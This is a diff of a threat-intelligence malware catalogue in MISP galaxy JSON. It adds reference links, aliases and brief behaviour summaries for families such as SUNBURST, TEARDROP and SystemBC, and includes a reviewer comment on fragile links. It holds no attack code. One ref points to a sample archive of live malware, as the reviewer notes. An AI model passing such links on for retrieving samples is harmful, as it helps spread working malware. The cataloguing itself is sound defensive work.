+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html",
+ "https://www.welivesecurity.com/media_files/white-papers/Stuxnet_Under_the_Microscope.pdf",
+ "https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/",
+ "https://news.yahoo.com/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html",
+ "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
 "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf"
 ],
 "synonyms": [],
@@ -16196,6 +29432,194 @@
 "uuid": "6ad84f52-0025-4a9d-861a-65c870f47988",
 "value": "Stuxnet"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.suceful",
+ "https://www.fireeye.com/blog/threat-research/2015/09/suceful_next_genera.html",
+ "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "efe586da-a272-4898-9ebb-587f8f5a23ca",
+ "value": "SUCEFUL"
+ },
+ {
+ "description": "FireEye describes SUNBURST as a trojanized SolarWinds digitally-signed component of the Orion software framework that contains a backdoor that communicates via HTTP to third party servers. After an initial dormant period of up to two weeks, it uses a DGA to generate specific subdomains for a set C&C domain. The backdoor retrieves and executes commands, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services. The C2 traffic to the malicious domains is designed to mimic normal SolarWinds API communications: Orion Improvement Program (OIP) protocol. The backdoor uses multiple obfuscated blocklists to identify forensic and anti-virus tools running as processes, services, and drivers. 
Multiple trojanzied updates were digitally signed from March - May 2020 and posted to the SolarWinds updates website.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunburst",
+ "https://www.brighttalk.com/webcast/7451/462719",
+ "https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/",
+ "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/",
+ "https://www.microsoft.com/en-us/security/business/threat-protection/solorigate-detection-guidance",
+ "https://www.netresec.com/?page=Blog&month=2020-12&post=Extracting-Security-Products-from-SUNBURST-DNS-Beacons",
+ "https://netresec.com/?b=212a6ad",
+ "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/",
+ "https://ics-cert.kaspersky.com/reports/2021/01/26/sunburst-industrial-victims/",
+ "https://github.com/github/codeql/tree/main/csharp/ql/src/experimental/Security%20Features/campaign",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-352a",
+ "https://www.domaintools.com/resources/blog/continuous-eruption-further-analysis-of-the-solarwinds-supply-incident",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/additional-analysis-into-the-sunburst-backdoor/",
+ "https://twitter.com/cybercdh/status/1339241246024404994",
+ "https://www.trustedsec.com/blog/solarwinds-backdoor-sunburst-incident-response-playbook/?hss_channel=tw-403811306",
+ "https://www.brighttalk.com/webcast/7451/469525",
+ "https://prevasio.com/static/web/viewer.html?file=/static/Anatomy_Of_SolarWinds_Supply_Chain_Attack.pdf",
+ "https://mp.weixin.qq.com/s/v-ekPFtVNZG1W7vWjcuVug",
+ "https://blog.truesec.com/2021/01/07/avoiding-supply-chain-attacks-similar-to-solarwinds-orions-sunburst",
+ "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-ii-dga-list-of.html",
+ "https://www.solarwinds.com/securityadvisory",
+ "https://netresec.com/?b=211f30f",
+ 
"https://drive.google.com/file/d/1R79Q1oC18GmKK8FYBoYEt0vYF7SpsvQI/view",
+ "https://github.com/sophos-cybersecurity/solarwinds-threathunt",
+ "https://twitter.com/megabeets_/status/1339308801112027138",
+ "https://www.youtube.com/watch?v=cMauHTV-lJg",
+ "https://twitter.com/0xrb/status/1339199268146442241",
+ "https://netresec.com/?b=211cd21",
+ "https://threatconnect.com/blog/tracking-sunburst-related-activity-with-threatconnect-dashboards",
+ "https://github.com/RedDrip7/SunBurst_DGA_Decode",
+ "https://www.domaintools.com/resources/blog/the-devils-in-the-details-sunburst-attribution",
+ "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714",
+ "https://www.cyborgsecurity.com/cyborg_labs/threat-hunt-deep-dives-solarwinds-supply-chain-compromise-solorigate-sunburst-backdoor/",
+ "https://www.crowdstrike.com/blog/crowdstrike-launches-free-tool-to-identify-and-help-mitigate-risks-in-azure-active-directory/",
+ "https://twitter.com/cybercdh/status/1338975171093336067",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds",
+ "https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data",
+ "https://www.justice.gov/opa/pr/department-justice-statement-solarwinds-update",
+ "https://blog.cloudflare.com/a-quirk-in-the-sunburst-dga-algorithm/",
+ "https://gist.github.com/olafhartong/71ffdd4cab4b6acd5cbcd1a0691ff82f",
+ "https://mp.weixin.qq.com/s/UqXC1vovKUu97569LkYm2Q",
+ "https://www.trustedsec.com/blog/solarwinds-orion-and-unc2452-summary-and-recommendations/",
+ "https://www.splunk.com/en_us/blog/security/smoothing-the-bumps-of-onboarding-threat-indicators-into-splunk-enterprise-security.html",
+ "https://www.4hou.com/posts/KzZR",
+ "https://www.comae.com/posts/sunburst-memory-analysis/",
+ 
"https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
+ "https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more",
+ "https://medium.com/insomniacs/a-look-into-sunbursts-dga-ba4029193947",
+ "https://docs.google.com/spreadsheets/d/1u0_Df5OMsdzZcTkBDiaAtObbIOkMa5xbeXdKk_k0vWs",
+ "https://techcommunity.microsoft.com/t5/azure-sentinel/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095",
+ "https://www.elastic.co/blog/supervised-and-unsupervised-machine-learning-for-dga-detection",
+ "https://twitter.com/KimZetter/status/1338305089597964290",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-unique-dga",
+ "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/",
+ "https://www.cyberark.com/resources/threat-research-blog/golden-saml-revisited-the-solorigate-connection",
+ "https://www.bleepingcomputer.com/news/security/mimecast-links-security-breach-to-solarwinds-hackers/",
+ "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
+ "https://www.aon.com/cyber-solutions/aon_cyber_labs/cloudy-with-a-chance-of-persistent-email-access/",
+ "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
+ "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/",
+ "https://go.recordedfuture.com/hubfs/reports/pov-2020-1230.pdf",
+ 
"https://www.microsoft.com/security/blog/2021/02/25/microsoft-open-sources-codeql-queries-used-to-hunt-for-solorigate-activity/",
+ "https://us-cert.cisa.gov/ncas/current-activity/2020/12/13/active-exploitation-solarwinds-software",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-a-device-to-cloud-architecture-defends-against-the-solarwinds-supply-chain-compromise/",
+ "https://www.ironnet.com/blog/a-closer-look-at-the-solarwinds/sunburst-malware-dga-or-dns-tunneling",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate",
+ "https://blog.prevasio.com/2020/12/sunburst-backdoor-deeper-look-into.html",
+ "https://www.youtube.com/watch?v=JoMwrkijTZ8",
+ "https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2020/12/18/sunburst-indicator-detection-in-qradar",
+ "https://www.securonix.com/web/wp-content/uploads/2020/12/threat_research_solarwinds_sunburst_eclipser_supply_chain.pdf",
+ "https://zengo.com/ungilded-secrets-a-new-paradigm-for-key-security/",
+ "https://www.cisa.gov/news/2021/01/05/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure",
+ "https://blog.cloudflare.com/solarwinds-orion-compromise-trend-data/",
+ "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/",
+ "https://www.ironnet.com/blog/solarwinds/sunburst-behavioral-analytics-and-collective-defense-in-action",
+ "https://securelist.com/sunburst-backdoor-kazuar/99981/",
+ "https://pastebin.com/6EDgCKxd",
+ "https://www.youtube.com/watch?v=mbGN1xqy1jY",
+ "https://www.solarwinds.com/securityadvisory/faq",
+ "https://blog.apiiro.com/detect-and-prevent-the-solarwinds-build-time-code-injection-attack",
+ "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-iii-dga-security.html",
+ "https://www.domaintools.com/resources/blog/unraveling-network-infrastructure-linked-to-the-solarwinds-hack",
+ "https://twitter.com/FireEye/status/1339295983583244302",
+ 
"https://mitre-attack.github.io/attack-navigator/#layerURL=https://raw.githubusercontent.com/center-for-threat-informed-defense/public-resources/master/solorigate/UNC2452.json",
+ "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:MSIL/Solorigate.B!dha",
+ "https://www.domaintools.com/resources/blog/change-in-perspective-on-the-utility-of-sunburst-related-network-indicators#",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a",
+ "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html",
+ "https://thenewstack.io/behind-the-scenes-of-the-sunburst-attack/",
+ "https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/",
+ "https://youtu.be/Ta_vatZ24Cs?t=59",
+ "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.cadosecurity.com/post/responding-to-solarigate",
+ "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach",
+ "https://www.microsoft.com/security/blog/2021/01/14/increasing-resilience-against-solorigate-and-other-sophisticated-attacks-with-microsoft-defender/",
+ "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
+ "https://news.sophos.com/en-us/2020/12/14/solarwinds-playbook/",
+ "https://twitter.com/ItsReallyNick/status/1338382939835478016",
+ "https://corelight.blog/2020/12/15/finding-sunburst-backdoor-with-zeek-logs-and-corelight/",
+ "https://blog.reversinglabs.com/blog/sunburst-the-next-level-of-stealth",
+ "https://mp.weixin.qq.com/s/lh7y_KHUxag_-pcFBC7d0Q",
+ "https://www.fireeye.com/blog/products-and-services/2021/02/light-in-the-dark-hunting-for-sunburst.html",
+ "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718",
+ 
"https://blogs.microsoft.com/on-the-issues/2020/12/17/cyberattacks-cybersecurity-solarwinds-fireeye/",
+ "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline",
+ "https://www.youtube.com/watch?v=LA-XE5Jy2kU",
+ "https://fidelissecurity.com/threatgeek/data-protection/ongoing-analysis-solarwinds-impact/",
+ "https://netresec.com/?b=2113a6a",
+ "https://www.zscaler.com/blogs/security-research/hitchhikers-guide-solarwinds-incident-response",
+ "https://www.fireeye.com/current-threats/sunburst-malware.html",
+ "https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html",
+ "https://github.com/fireeye/sunburst_countermeasures",
+ "https://twitter.com/Intel471Inc/status/1339233255741120513",
+ "https://www.cyborgsecurity.com/blog/sunburst-solarwinds-supply-chain-attack/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-command-control",
+ "https://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html",
+ "https://blog.truesec.com/2020/12/17/the-solarwinds-orion-sunburst-supply-chain-attack/",
+ "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610",
+ "https://github.com/SentineLabs/SolarWinds_Countermeasures",
+ "https://www.mimecast.com/blog/important-security-update/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-attacks-stealthy-attackers-attempted-evade-detection",
+ "https://www.splunk.com/en_us/blog/security/sunburst-backdoor-detections-in-splunk.html",
+ "https://twitter.com/lordx64/status/1338526166051934213",
+ "https://www.netresec.com/?page=Blog&month=2020-12&post=Reassembling-Victim-Domain-Fragments-from-SUNBURST-DNS",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-008a",
+ "https://vrieshd.medium.com/finding-sunburst-victims-and-targets-by-using-passivedns-osint-68f5704a3cdc",
+ 
"https://github.com/fireeye/Mandiant-Azure-AD-Investigator",
+ "https://www.bleepingcomputer.com/news/security/nasa-and-the-faa-were-also-breached-by-the-solarwinds-hackers/",
+ "https://vxug.fakedoma.in/samples/Exotic/UNC2452/SolarWinds%20Breach/",
+ "https://twitter.com/cybercdh/status/1338885244246765569",
+ "https://research.checkpoint.com/2021/deep-into-the-sunburst-attack/",
+ "https://labs.sentinelone.com/solarwinds-sunburst-backdoor-inside-the-stealthy-apt-campaign/",
+ "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack",
+ "https://www.bleepingcomputer.com/news/security/fireeye-microsoft-create-kill-switch-for-solarwinds-backdoor/",
+ "https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/",
+ "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware"
+ ],
+ "synonyms": [
+ "Solorigate"
+ ],
+ "type": []
+ },
+ "uuid": "34e50688-6955-4c28-8e18-50252e5ea711",
+ "value": "SUNBURST"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://medium.com/@sapphirex00/diving-into-the-sun-suncrypt-a-new-neighbour-in-the-ransomware-mafia-d89010c9df83",
+ "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt",
+ "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "018fb88b-a3cd-46b7-adea-a5b85302715b",
+ "value": "SunCrypt"
+ },
 {
 "description": "",
 "meta": {
@@ -16210,6 +29634,36 @@
 "uuid": "a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4",
 "value": "SunOrcal"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.supernova",
+ "https://www.trendmicro.com/en_us/research/20/l/overview-of-recent-sunburst-targeted-attacks.html",
+ "https://github.com/fireeye/sunburst_countermeasures",
+ "https://labs.sentinelone.com/solarwinds-understanding-detecting-the-supernova-webshell-trojan/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-008a",
+ "https://www.anquanke.com/post/id/226029",
+ "https://www.solarwinds.com/securityadvisory/faq",
+ "https://www.solarwinds.com/securityadvisory",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a",
+ "https://unit42.paloaltonetworks.com/solarstorm-supernova/",
+ "https://github.com/fireeye/sunburst_countermeasures/pull/5",
+ "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
+ "https://www.youtube.com/watch?v=7WX5fCEzTlA",
+ "https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group",
+ "https://twitter.com/MalwareRE/status/1342888881373503488",
+ "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
+ "https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "62674a18-54c6-4c57-84cc-ea6a3bb2d6d6",
+ "value": "SUPERNOVA"
+ },
 {
 "description": "",
 "meta": {
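Review bot: Several of the new SUNBURST `refs` are unstable or non-publication locations rather than reports: a `pastebin.com` paste, a `drive.google.com` file, a `docs.google.com` spreadsheet, a `prevasio.com/static/web/viewer.html?file=…` viewer wrapper around a PDF, and a `vxug.fakedoma.in/samples/…` directory that is a sample archive rather than an analysis. Such links rot without notice, and the sample-archive entry hands a galaxy consumer a pointer to live malware instead of documentation. The file already wraps fragile sources in `web.archive.org` snapshots (the Sykipot and taidoor hunks do this for a raw GitHub PDF); the same treatment for the ephemeral links, and dropping the sample-archive link, would suit a curated galaxy better. Since `refs` are taken verbatim from Malpedia, this is a filter to apply in the export script or a request upstream rather than an edit to this hunk.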
@@ -16233,14 +29687,27 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.swift",
- "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.surtr",
+ "https://citizenlab.ca/2013/08/surtr-malware-family-targeting-the-tibetan-community/"
 ],
 "synonyms": [],
 "type": []
 },
- "uuid": "8420653b-1412-45a1-9a2d-6aa9b9eaf906",
- "value": "Swift?"
+ "uuid": "8666afcc-8cc2-4856-83de-b7e8b4309367",
+ "value": "surtr"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.swen",
+ "https://en.wikipedia.org/wiki/Swen_(computer_worm)"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "63657a3b-1f8f-422d-80de-fe4644f5d7ba",
+ "value": "swen"
 },
 {
 "description": "",
@@ -16261,11 +29728,14 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot",
 "https://www.alienvault.com/blogs/labs-research/sykipot-is-back",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/",
 "https://community.rsa.com/thread/185437",
+ "https://www.secureworks.com/research/threat-profiles/bronze-edison",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/",
 "https://www.symantec.com/connect/blogs/sykipot-attacks"
 ],
 "synonyms": [
+ "Wkysol",
 "getkys"
 ],
 "type": []
@@ -16340,11 +29810,12 @@
 "value": "Sys10"
 },
 {
- "description": "",
+ "description": "SYSCON is a Remote Access Trojan used in a targeted champing against US government agencies. It has been recently observed in conjunction with CARROTBAT and CARROTBALL downloaders and it uses the File Transfer Protocol as Command and Control channel. Use of the family is attributed by Unit 42 to the Konni Group. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon",
 "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
 "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/"
 ],
 "synonyms": [],
@@ -16366,11 +29837,31 @@
 "uuid": "a4b9c526-42d0-4de9-ab8e-e78f99655d11",
 "value": "SysGet"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.syskit",
+ "https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897",
+ "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html",
+ "https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain",
+ "https://twitter.com/QW5kcmV3/status/1176861114535165952"
+ ],
+ "synonyms": [
+ "IvizTech",
+ "MANGOPUNCH"
+ ],
+ "type": []
+ },
+ "uuid": "4922f27b-a97c-4d6b-9425-1705f4716ee0",
+ "value": "SysKit"
+ },
 {
 "description": "Sysraw stealer got its name because at some point, it was started as \"ZSysRaw\\sysraw.exe\". PDB strings suggest the name \"Clipsa\" though. First stage connects to /WPCoreLog/, the second one to /WPSecurity/. Its behavior suggest that it is an info stealer. It creates a rather large amount of files in a subdirectory (e.g. data) named \"1?[-+].dat\" and POSTs them.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysraw_stealer",
+ "https://decoded.avast.io/janrubin/clipsa-multipurpose-password-stealer/",
 "https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/"
 ],
 "synonyms": [
@@ -16393,6 +29884,23 @@
 "uuid": "7007b268-f6f4-4a01-9184-fc2334461c38",
 "value": "SysScan"
 },
+ {
+ "description": "SystemBC is a proxy malware leveraging SOCKS5. Based on screenshots used in ads on a underground marketplace, Proofpoint decided to call it SystemBC.\r\n\r\nSystemBC has been observed occasionally, but more pronounced since June 2019. First samples goes back to October 2018.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc",
+ "https://www.proofpoint.com/us/threat-insight/post/systembc-christmas-july-socks5-malware-and-exploit-kits",
+ "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
+ "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/",
+ "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/",
+ "https://news.sophos.com/en-us/2020/12/16/systembc/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cd0ad49d-7f79-45e0-91ba-c5eecdabe3aa",
+ "value": "SystemBC"
+ },
 {
 "description": "",
 "meta": {
@@ -16427,9 +29935,14 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor",
 "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a",
 "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf",
 "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html",
- "https://www.nttsecurity.com/docs/librariesprovider3/resources/taidoor%E3%82%92%E7%94%A8%E3%81%84%E3%81%9F%E6%A8%99%E7%9A%84%E5%9E%8B%E6%94%BB%E6%92%83%E8%A7%A3%E6%9E%90%E3%83%AC%E3%83%9D%E3%83%BC%E3%83%88_v1"
+ "https://blog.reversinglabs.com/blog/taidoor-a-truly-persistent-threat",
+ "https://www.nttsecurity.com/docs/librariesprovider3/resources/taidoor%E3%82%92%E7%94%A8%E3%81%84%E3%81%9F%E6%A8%99%E7%9A%84%E5%9E%8B%E6%94%BB%E6%92%83%E8%A7%A3%E6%9E%90%E3%83%AC%E3%83%9D%E3%83%BC%E3%83%88_v1",
+ "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf"
 ],
 "synonyms": [
 "simbot"
@@ -16439,6 +29952,20 @@
 "uuid": "94323b32-9566-450b-8480-5f9f53b57948",
 "value": "taidoor"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taintedscribe",
+ "https://www.us-cert.gov/ncas/analysis-reports/ar20-133b",
+ "https://blog.reversinglabs.com/blog/hidden-cobra"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "014940fb-6e31-408a-962f-71914d0eb2f5",
+ "value": "TAINTEDSCRIBE"
+ },
 {
 "description": "",
 "meta": {
@@ -16469,8 +29996,7 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux",
- "https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux"
 ],
 "synonyms": [],
 "type": []
@@ -16491,14 +30017,48 @@
 "uuid": "ea6a62b2-db33-4d60-9823-5117c20b6457",
 "value": "Tarsip"
 },
+ {
+ "description": "According to Zscaler, Taurus is a stealer that surfaced in June 2020. It is being developed by the author(s) that previously created Predator the Thief. The name overlaps partly with the StealerOne / Terra* family (also aliased Taurus Loader) but appears to be a completely disjunct project.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taurus_stealer",
+ "https://www.zscaler.com/blogs/research/taurus-new-stealer-town",
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "68b89458-f78e-41b3-b0ee-c193aaa948f9",
+ "value": "Taurus Stealer"
+ },
+ {
+ "description": "Steve Miller pointed out that it is proxy-aware (Tencent) for C&C communication and uses wolfSSL, which makes it stick out.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tclient",
+ "https://twitter.com/stvemillertime/status/1266050369370677249"
+ ],
+ "synonyms": [
+ "FIRESHADOW"
+ ],
+ "type": []
+ },
+ "uuid": "fc551237-8db7-4cfd-a915-9e8410abb313",
+ "value": "TClient"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer",
- "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf"
+ "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf",
+ "https://securityintelligence.com/hammertoss-what-me-worry/",
+ "https://www.youtube.com/watch?v=UE9suwyuic8"
+ ],
+ "synonyms": [
+ "HAMMERTOSS",
+ "HammerDuke"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "bbbf4786-1aba-40ac-8ad7-c9d8c66197a8",
@@ -16532,6 +30092,61 @@ "uuid": "045469d0-5bb2-4ed9-9ee2-a0a08f437433", "value": "TeamBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.teamspy", + "https://blog.trendmicro.com/trendlabs-security-intelligence/unsupported-teamviewer-versions-exploited-backdoors-keylogging", + "https://www.cyber.nj.gov/threat-center/threat-profiles/trojan-variants/spy-agent" + ], + "synonyms": [ + "TVRAT", + "TVSPY", + "TeamViewerENT" + ], + "type": [] + }, + "uuid": "9a82b6f6-2fdf-47bc-af05-cf7ce225fc96", + "value": "TeamSpy" + }, + { + "description": "TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file \u201cgracious_truth.jpg\u201d, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. 
FireEye believe that this was used to execute a customized Cobalt Strike BEACON.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.teardrop", + "https://www.brighttalk.com/webcast/7451/462719", + "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader", + "https://twitter.com/craiu/status/1339954817247158272", + "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline", + "https://www.youtube.com/watch?v=LA-XE5Jy2kU", + "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/", + "https://github.com/fireeye/sunburst_countermeasures", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more", + 